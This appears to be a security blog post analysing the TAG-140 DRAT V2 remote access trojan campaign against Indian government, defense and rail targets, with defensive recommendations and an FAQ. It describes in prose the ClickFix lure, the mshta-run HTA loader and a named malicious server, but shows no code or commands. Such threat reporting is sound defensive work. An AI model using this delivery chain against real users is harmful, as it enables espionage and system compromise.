|

Inside the TAG-140 DRAT V2 Campaign: How Evolving RATs Threaten Indian Government, Defense, and Rail Sectors

ByInnoVirtuoso

Cybersecurity threats are evolving at breakneck speed—and nowhere is this more evident than in the latest campaign unleashed by TAG-140. With a newly weaponized Remote Access Trojan (RAT) called DRAT V2, this elusive group is setting its sights on India’s most critical sectors: government, defense, and railways. If you’re wondering how these attacks work, who TAG-140 really is, and what this means for cybersecurity in the region, you’re in the right place. Let’s break down what you need to know about the DRAT V2 threat, how it operates, and what organizations should do to stay a step ahead.

Why Should You Care About TAG-140 and DRAT V2?

Cyberattacks are no longer just about stealing data—they’re about disrupting entire national infrastructures. When a threat actor like TAG-140 upgrades its arsenal and shifts its targets, everyone from government officials to IT administrators and regular citizens has a stake in the outcome.

Here’s why it matters:

  • National Security: Targeting government and defense opens doors to espionage, sabotage, and the leaking of sensitive information.
  • Economic Impact: Attacks on rail and oil & gas sectors can disrupt transportation, energy, and commerce.
  • Personal Privacy: When critical systems are compromised, citizens’ data and daily lives can be affected.

Let’s dig deeper into this campaign, so you can understand the risks and the evolving playbook of modern cyber adversaries.

Who is TAG-140? Unraveling the Mystery Behind the Hackers

TAG-140 isn’t a household name—yet. But within the cybersecurity community, this group has earned a reputation as one of the most persistent and innovative Advanced Persistent Threats (APTs) in South Asia.

Key Facts About TAG-140

  • Attribution: Linked to SideCopy and Transparent Tribe (APT36), groups with a storied history of targeting Indian interests. For background, see MITRE ATT&CK APT36.
  • Ties Beyond Pakistan: While often associated with Pakistan, TAG-140 exhibits operational practices and malware development that suggest a broader network or influence.
  • Not New to the Scene: TAG-140 has been active since at least 2019, steadily refining its tactics and diversifying its targets.

Bottom line: TAG-140 represents the cutting edge of state-sponsored cyber espionage and sabotage, with a special focus on Indian sectors.

DRAT V2: The Latest Weapon in TAG-140’s Arsenal

What is DRAT V2?

DRAT V2 is a modified, more dangerous version of the original DRAT remote access trojan. It’s the latest addition to an ever-expanding suite of RATs used by TAG-140 and its affiliates. These tools are designed to infiltrate computers, maintain persistence, exfiltrate sensitive data, and even enable remote control for further attacks.

How Does DRAT V2 Stand Out?

DRAT V2 isn’t just a simple upgrade—it’s a calculated evolution. Let’s break down the unique features that make it both effective and challenging to defend against:

  • New Command Functionality: DRAT V2 adds the ability to execute arbitrary shell commands, enabling flexible post-exploitation actions.
  • Obfuscated Communication: It uses Base64 encoding to obscure command-and-control (C2) IP addresses, complicating network detection.
  • Protocol Upgrade: Supports both ASCII and Unicode command inputs (but replies in ASCII), expanding compatibility and stealth.
  • Reduced String Obfuscation: By leaving more command headers in plaintext, it prioritizes reliable parsing over hiding its tracks.
  • Basic Persistence: Relies chiefly on Windows Registry modifications for persistence rather than advanced anti-analysis techniques.

Why does that matter? These changes show TAG-140 is more concerned with operational reliability and rapid deployment across many targets than with advanced evasion—likely because their social engineering and delivery are already effective.

How TAG-140 Delivers DRAT V2: The Anatomy of an Attack

Let’s walk through the attack chain so you can see exactly how DRAT V2 sneaks onto targeted systems.

Step 1: Spoofed Indian Ministry of Defence Portal

The attackers craft a near-perfect clone of the official Indian Ministry of Defence press release portal. This credible decoy lures in victims—typically government or defense staff—who trust the source.

Step 2: The ClickFix Trick

Here’s where social engineering meets technical trickery. The fake portal contains a single active link. Clicking it:

  • Copies a malicious command to the clipboard.
  • Prompts the victim to paste and run it in their command shell.

This approach leverages human trust and curiosity—a simple yet effective method.

Step 3: The HTA File Dropper

When the victim executes the copied command:

  • Their machine reaches out to a remote server (trade4wealth[.]in) to download an HTML Application (.hta) file.
  • This file is run using mshta.exe, a legitimate Windows tool.
  • The HTA file launches a loader known as “BroaderAspect.”

Step 4: Loader Actions and DRAT V2 Deployment

What does BroaderAspect do?

  • Downloads and opens a decoy PDF (to distract the victim).
  • Sets up persistence via Windows Registry changes.
  • Fetches and executes DRAT V2 from the same malicious server.

Step 5: DRAT V2 Takes Over

Once installed, DRAT V2 establishes a connection back to the attackers’ C2 infrastructure, ready to receive commands and exfiltrate data.

What Makes DRAT V2 Dangerous?

Let’s talk impact. Once DRAT V2 is running on a system, TAG-140 can:

  • Collect reconnaissance data (system info, network configuration).
  • Upload additional malware payloads.
  • Exfiltrate sensitive documents and credentials.
  • Maintain persistent, flexible control for ongoing espionage or sabotage.

With the addition of shell command execution, the attacker’s options expand from simple surveillance to full system manipulation.

Here’s why that’s alarming: In highly sensitive sectors like defense or railways, this could mean anything from stolen confidential plans to disruption of critical operations.

The Expanding Scope: Beyond Government to Railways, Oil, and More

TAG-140’s operations aren’t standing still. According to research from Recorded Future, the group has widened its net considerably.

Recent Targets Include:

  • Railway networks
  • Oil & gas companies
  • External affairs ministries
  • Maritime and academic sectors

This shift signals a move from pure espionage toward attacks that could disrupt infrastructure, undermine public trust, or even cause physical consequences if critical systems are tampered with.

Why Does TAG-140 Rotate RATs and Techniques?

If you’re wondering, “Why develop so many RATs?” you’re not alone. TAG-140’s ever-rotating toolkit—including Action RAT, AllaKore RAT, ReverseRAT, Spark RAT, and more—serves a tactical purpose:

  • Complicates Attribution: Rotating tools muddy the forensic waters, making it harder for defenders to pin attacks on a specific group.
  • Evades Detection: New and tweaked malware variants slip past traditional security solutions.
  • Maintains Flexibility: If one tool is detected and blocked, another is ready to deploy.

The upshot? TAG-140 is playing a long game, prioritizing operational continuity over any single campaign’s stealth.

APT36 and Coordinated Attacks During India-Pakistan Tensions

The backdrop to these campaigns is heightened geopolitical tension. During the India-Pakistan conflict in May 2025, state-sponsored activity and hacktivism surged.

What Did This Look Like?

  • APT36, SideCopy, and Transparent Tribe all ramped up efforts.
  • Delivery of Ares RAT and new malware like DISGOMOJI#.
  • Phishing emails with malicious PDFs targeted defense, government, IT, healthcare, education, and telecom sectors.
  • Focused on remote access, surveillance, and potential disruption of critical services.

These coordinated campaigns serve as a stark reminder: Cyberspace is a frontline in modern international conflicts.

Defense Strategies: How Organizations Can Respond

So, what can Indian organizations—and any entity in the crosshairs of state-sponsored threat groups—do to defend themselves?

1. Employee Awareness and Training

  • Simulate phishing and social engineering attacks regularly.
  • Teach users to recognize spoofed login portals and suspicious prompts.
  • Encourage a “zero trust” approach to unexpected requests—even from familiar-looking sources.

2. Patch and Harden Systems

  • Keep all software up to date, especially Windows OS and security tools.
  • Disable or tightly control execution of scripting engines like mshta.exe where possible.

3. Enhanced Detection and Response

  • Behavioral monitoring: Look for telltale signs like new registry persistence entries or clipboard manipulation.
  • Use threat intelligence feeds to stay updated on new IOCs (Indicators of Compromise) and RAT variants.
  • Static and dynamic analysis: Regularly scan for both known and anomalous malware behavior.

4. Segmentation and Access Controls

  • Limit user privileges—don’t let ordinary accounts run shell commands or install software.
  • Segregate networks handling critical data or infrastructure from the rest of the organization.

5. Incident Response Planning

  • Prepare for the worst. Have clear protocols for isolation, investigation, and recovery when a breach occurs.
  • Regularly update plans to reflect new attack vectors like those used by TAG-140.

For more best practices, see the CERT-In cybersecurity guidelines and the Indian Computer Emergency Response Team.

Lessons from the DRAT V2 Campaign: What’s Next for Indian Cybersecurity?

The DRAT V2 campaign is a clear sign that Indian critical sectors are under sustained, evolving threat from sophisticated cyber adversaries. The playbook is changing—faster than many organizations realize.

Key Takeaways

  • Adaptation is the norm: TAG-140’s frequent tool rotation means defenders must get comfortable with rapid change.
  • Social engineering is effective: Even the best systems can be undermined by a well-crafted phishing campaign.
  • Collaboration is vital: Government, private sector, and international partners need to share intelligence and response strategies.

If you’re responsible for security in a targeted sector, now’s the time to revisit your defenses and invest in ongoing cybersecurity education.

Frequently Asked Questions (FAQ)

Q1: What is DRAT V2 and how does it differ from regular RATs?
A: DRAT V2 is a customized remote access trojan deployed by TAG-140. Unlike generic RATs, it includes specific features for flexible command execution, obfuscated C2 communication, and is tailored for stealth and persistence within Indian government and critical infrastructure environments.

Q2: Who is TAG-140 and are they part of APT36?
A: TAG-140 is a hacking group with operational overlaps with SideCopy and Transparent Tribe (APT36). While they share tactics and toolsets, TAG-140 is tracked as a distinct cluster, possibly with broader affiliations beyond Pakistan.

Q3: How do these attacks typically start?
A: Most attacks begin with social engineering—spoofed websites or phishing emails that trick users into executing malicious commands. This initiates the download and execution of malware like DRAT V2.

Q4: What sectors are currently being targeted?
A: Indian government, defense, railways, oil & gas, external affairs, maritime, and academic sectors have all been targeted in recent campaigns.

Q5: How can organizations defend against DRAT V2 and similar threats?
A: Key defenses include user training, patching systems, limiting script execution, continuous monitoring for suspicious behavior, and active threat intelligence sharing.

Q6: Is DRAT V2 easy to detect?
A: While DRAT V2 lacks advanced anti-analysis and uses basic persistence, its newness and obfuscated C2 can help it evade outdated security tools. Modern behavioral and threat intelligence-driven detection increases chances of catching it early.

Q7: Where can I learn more about current APT threats in India?
A: Check resources from Recorded Future, The Hacker News, and CERT-In for up-to-date reports and advisories.

Final Thoughts: Stay Informed, Stay Secure

The TAG-140 DRAT V2 campaign is just the tip of the iceberg in a rapidly shifting cyber threat landscape. As attackers adapt, so must defenders. Whether you’re a CISO, IT admin, or simply a concerned citizen, staying informed is your best defense.

Actionable Insight:
Review your organization’s current email and web filtering practices. Simulate a phishing attack using a spoofed internal portal, and see how your team responds. Use the results as a springboard for improved training and technical controls.

Want more insights on emerging cyber threats and practical security strategies? Subscribe to our newsletter and stay one step ahead in the fight for digital security.

Discover more at InnoVirtuoso.com

I would love some feedback on my writing so if you have any, please don’t hesitate to leave a comment around here or in any platforms that is convenient for you.

For more on tech and other topics, explore InnoVirtuoso.com anytime. Subscribe to my newsletter and join our growing community—we’ll create something magical together. I promise, it’ll never be boring! 

Stay updated with the latest news—subscribe to our newsletter today!

Thank you all—wishing you an amazing day ahead!

Read more related Articles at InnoVirtuoso

InnoVirtuoso

Hello there! I'm passionate content writer navigating the digital landscape. With a deep love for words and an insatiable curiosity about technology.

With 10 years of experience in IT field, I write mostly about emerging tech, sharing news, informational articles and covering other topics I find interesting.

Let's craft the future of content together – one word at a time!

Browse InnoVirtuoso for more!

Ransomware Crisis at Nova Scotia Power: What the Attack Means for Customers and How to Stay Protected
|

Ransomware Crisis at Nova Scotia Power: What the Attack Means for Customers and How to Stay Protected

ByInnoVirtuoso

Imagine opening your next electricity bill and wondering: “Is this number even real?” That’s the reality facing hundreds of thousands of Nova Scotia Power customers after a sophisticated ransomware attack halted meter data collection and exposed sensitive personal information—including bank account numbers. In this post, I’ll break down what happened, what it means for your…

Taiwan Warns: TikTok, Weibo, and RedNote Pose Serious Data Risks Due to China Ties—Here’s What You Need to Know
|

Taiwan Warns: TikTok, Weibo, and RedNote Pose Serious Data Risks Due to China Ties—Here’s What You Need to Know

ByInnoVirtuoso

Are you worried about where your personal data goes every time you open TikTok or scroll through Weibo? You’re not alone—and Taiwan’s National Security Bureau (NSB) is ringing the alarm bells louder than ever. This isn’t just another news headline. It’s a wake-up call for anyone who uses popular Chinese-developed apps. The NSB’s recent warning…

AI-Powered Malware: How Reinforcement Learning Models Now Outsmart Microsoft Defender
|

AI-Powered Malware: How Reinforcement Learning Models Now Outsmart Microsoft Defender

ByInnoVirtuoso

Imagine a future where hackers don’t just write malware—they train artificial intelligence (AI) to do it for them. Not in a clumsy, copy-paste way, but with surgical precision, consistently slipping past even the most advanced security software like Microsoft Defender for Endpoint. Sound alarming? That future is arriving faster than you might think. At Black…

Know Your Enemy: The Hidden Rules of Dark Market Dynamics Every Cyber Defender Should Understand
|

Know Your Enemy: The Hidden Rules of Dark Market Dynamics Every Cyber Defender Should Understand

ByInnoVirtuoso

Imagine fighting a battle without knowing your opponent’s strategies, weapons, or motivations. That’s the reality for many organizations defending against cybercrime today. The “dark web” has long been cast as a shadowy, chaotic realm—a digital Wild West ruled by hooded hackers and faceless kingpins. But in truth, underground marketplaces are far more organized, innovative, and…

Why CISOs Are Turning to Managed Security Providers: The Skills Gap Dilemma
|

Why CISOs Are Turning to Managed Security Providers: The Skills Gap Dilemma

ByInnoVirtuoso

It’s a scenario playing out in boardrooms and IT war rooms across the globe: cybersecurity leaders, or CISOs, are feeling the heat. They’re juggling surging cyber threats, tightening budgets, and—perhaps most critically—an unrelenting shortage of skilled talent. As the pressure mounts, a growing number are seeking lifelines in the form of managed security service providers…

Cybersecurity for Small Businesses: 15 Essential Tips to Protect Your Company from Modern Threats
|

Cybersecurity for Small Businesses: 15 Essential Tips to Protect Your Company from Modern Threats

ByInnoVirtuoso

Cybersecurity isn’t just a buzzword or a distant concern for tech giants—it’s a make-or-break reality for every small business today. If you think hackers only target big corporations, think again. In fact, cybercriminals often see small businesses as “low-hanging fruit”—valuable, but less protected. The stakes? Lost money, stolen data, damaged reputations, and, all too often,…